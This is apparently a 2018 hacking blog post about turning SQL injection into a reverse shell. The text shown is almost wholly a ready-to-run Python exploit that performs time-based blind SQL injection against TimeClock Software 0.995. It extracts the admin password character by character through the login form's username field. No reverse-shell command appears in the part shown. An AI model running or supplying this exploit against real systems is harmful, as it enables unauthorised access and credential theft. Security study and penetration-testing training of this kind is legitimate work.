Anatomy of an attack: Gaining Reverse Shell from SQL injection. Posted in Hacking on March 28, 2018.
#!/usr/bin/env python
#
# Time-based blind SQL injection for TimeClock Software
# Based on TimeClock Software 0.995 - Multiple SQL Injections
# https://www.exploit-db.com/exploits/39404/
#
# Usage: timeclock.py <Host> <Port>
#
import requests, string, sys

# Injected into the username field; %d is the character position, %s the guess.
query = "' union SELECT * from user_info WHERE username = 'admin' and substr(password, %d, 1) = binary '%s' and sleep(2) -- "
chars = string.ascii_letters + '0123456789'
host = sys.argv[1]
port = sys.argv[2]

print('Running!')
for i in range(1, 100):
    found = False
    for c in chars:
        try:
            requests.post('http://' + host + ':' + port + '/index.php',
                          data={'username': query % (i, c), 'password': 'pass', 'submit': 'Log In'},
                          timeout=1)
        except requests.exceptions.Timeout:
            # The response was delayed past the 1 s timeout, so sleep(2) ran
            # and the guessed character matched at this position.
            sys.stdout.write(c)
            sys.stdout.flush()
            found = True
            break
    # No candidate caused a delay: stop at this position.
    if not found:
        break
print('\nDone! Try Harder!')